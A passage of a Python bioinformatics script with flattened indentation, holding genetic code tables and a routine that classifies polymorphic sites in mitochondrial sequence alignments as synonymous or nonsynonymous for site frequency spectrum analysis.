'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 
'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 
'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
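#The (start,stop) coordinates above are 0-based and half-open, so the gene containing a site
#can be looked up as in this illustrative one-liner (a sketch, not a helper the script defines):
#	gene = next((g for (start, stop), g in positionDict.items() if start <= site < stop), None)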
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
sexList = []
outList = []
asexList = []
logfile = open(fasta[0:-5] + '_foldedSFS.log','w')
for seq in seqList:
if '$' in seq:
popList.append(seq)
if '*' in seq:
sexList.append(seq)
else:
asexList.append(seq)
else:
outList.append(seq)
refSeq = seqDict[sexList[0]]
sys.stdout.write('Site\tCodon Position\tCodon Number\tAllele List\tAA List\tType of Change\t1\t2\t3\t4\t5\t6\t7\tC/R Index\t# Individuals w/ Minor Allele\n')
for site in range(len(refSeq)):
codonNum = site // 3 #floor division keeps an integer codon index under both Python 2 and 3
pos = (site+1)%3
if pos == 1:
nucPos = 1
elif pos == 2:
nucPos = 2
elif pos == 0:
nucPos = 3
currAlleleDict = {}
currAlleleList = []
for seq in asexList:
currSeq = seqDict[seq]
currNuc = currSeq[site]
if currNuc not in currAlleleList and currNuc != 'N' and currNuc != '-':
currAlleleList.append(currNuc)
currAlleleDict[currNuc] = 1
elif currNuc != 'N' and currNuc != '-':
currValue = currAlleleDict[currNuc] + 1
currAlleleDict[currNuc] = currValue
if len(currAlleleDict) == 2:
currCodonDict = {}
currCodonList = []
for seq in asexList:
currCodons = codonDict[seq]
currCodon = currCodons[codonNum]
if 'N' not in currCodon and '-' not in currCodon and currCodon not in currCodonList:
currCodonList.append(currCodon)
currCodonDict[currCodon] = 1
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currCodonDict[currCodon] + 1
currCodonDict[currCodon] = currValue
currAAList = []
for codon in currCodonList:
if codonNum == 0:
if codon in startCodons:
if 'M' not in currAAList:
currAAList.append('M')
else:
if geneticCode[codon] not in currAAList:
currAAList.append(geneticCode[codon])
elif geneticCode[codon] not in currAAList:
currAAList.append(geneticCode[codon])
if len(currAAList) == 1:
if currAlleleDict[currAlleleList[1]] < currAlleleDict[currAlleleList[0]]:
currMin = currAlleleList[1]
else:
currMin = currAlleleList[0]
sys.stdout.write(str(site + 1) + '\t' + str(nucPos) + '\t' + str(codonNum + 1) + '\t' + str(currAlleleList) + '\t' + currAAList[0] + '\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(currAlleleDict[currMin]) + '\n')
elif len(currCodonDict) == 2:
if currAlleleDict[currAlleleList[1]] < currAlleleDict[currAlleleList[0]]:
currMin = currAlleleList[1]
else:
currMin = currAlleleList[0]
mutType = CRI(currAAList)
sys.stdout.write(str(site + 1) + '\t' + str(nucPos) + '\t' + str(codonNum + 1) + '\t' + str(currAlleleList) + '\t' + str(currAAList) + '\tN\t' + str(mutType[0]) + '\t' + str(mutType[1]) + '\t' + str(mutType[2]) + '\t' + str(mutType[3]) + '\t' + str(mutType[4]) + '\t' + str(mutType[5]) + '\t' + str(mutType[6]) + '\t' + str(mutType[7]) + '\t' + str(currAlleleDict[currMin]) + '\n')
else:
currMax = currCodonDict[currCodonList[0]]
maxCodon = currCodonList[0]
currMin = currCodonDict[currCodonList[0]]
minCodon = currCodonList[0]
for codon in currCodonList[1:]:
if currCodonDict[codon] >= currMax:
currMax = currCodonDict[codon]
maxCodon = codon
elif currCodonDict[codon] <= currMin:
currMin = currCodonDict[codon]
minCodon = codon
newAAList = []
if codonNum == 0:
if maxCodon in startCodons:
newAAList.append('M')
else:
newAAList.append(geneticCode[maxCodon])
if minCodon not in startCodons:
newAAList.append(geneticCode[minCodon])
else:
newAAList.append(geneticCode[maxCodon])
if geneticCode[minCodon] not in newAAList:
newAAList.append(geneticCode[minCodon])
if len(newAAList) == 2:
mutType = CRI(newAAList)
sys.stdout.write(str(site + 1) + '\t' + str(nucPos) + '\t' + str(codonNum + 1) + '\t' + str(currAlleleList) + '\t' + str(newAAList) + '\tN\t' + str(mutType[0]) + '\t' + str(mutType[1]) + '\t' + str(mutType[2]) + '\t' + str(mutType[3]) + '\t' + str(mutType[4]) + '\t' + str(mutType[5]) + '\t' + str(mutType[6]) + '\t' + str(mutType[7]) + '\t' + str(currCodonDict[minCodon]) + '\n')
else:
sys.stdout.write(str(site + 1) + '\t' + str(nucPos) + '\t' + str(codonNum + 1) + '\t' + str(currAlleleList) + '\t' + newAAList[0] + '\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(currCodonDict[minCodon]) + '\n')
elif len(currAlleleList) > 2:
currCodonDict = {}
currCodonList = []
for seq in asexList:
currCodons = codonDict[seq]
currCodon = currCodons[codonNum]
if 'N' not in currCodon and '-' not in currCodon and currCodon not in currCodonList:
currCodonList.append(currCodon)
currCodonDict[currCodon] = 1
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currCodonDict[currCodon] + 1
currCodonDict[currCodon] = currValue
currAAList = []
for codon in currCodonList:
if codonNum == 0:
if codon in startCodons:
if 'M' not in currAAList:
currAAList.append('M')
else:
if geneticCode[codon] not in currAAList:
currAAList.append(geneticCode[codon])
elif geneticCode[codon] not in currAAList:
currAAList.append(geneticCode[codon])
logfile.write(str(site + 1) + '\t' + str(nucPos) + '\t' + str(codonNum + 1) + '\t' + str(currCodonDict) + '\t' + str(currAAList) + '\n')
logfile.close()
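#A minimal sketch of the synonymous/nonsynonymous call the loop above makes (classifySite is
#a hypothetical helper, not defined in this script): a biallelic site is synonymous when both
#observed codons translate to the same amino acid, and nonsynonymous otherwise.
def classifySite(codonA, codonB, geneticCode):
	if geneticCode[codonA] == geneticCode[codonB]:
		return 'S' #synonymous: the amino acid is unchanged
	return 'N' #nonsynonymous: the amino acid differs
#e.g. classifySite('TTA', 'TTG', geneticCodes['invertebrateMt']) returns 'S' (both encode Leu)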
def numSingletons(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 
'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 
'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 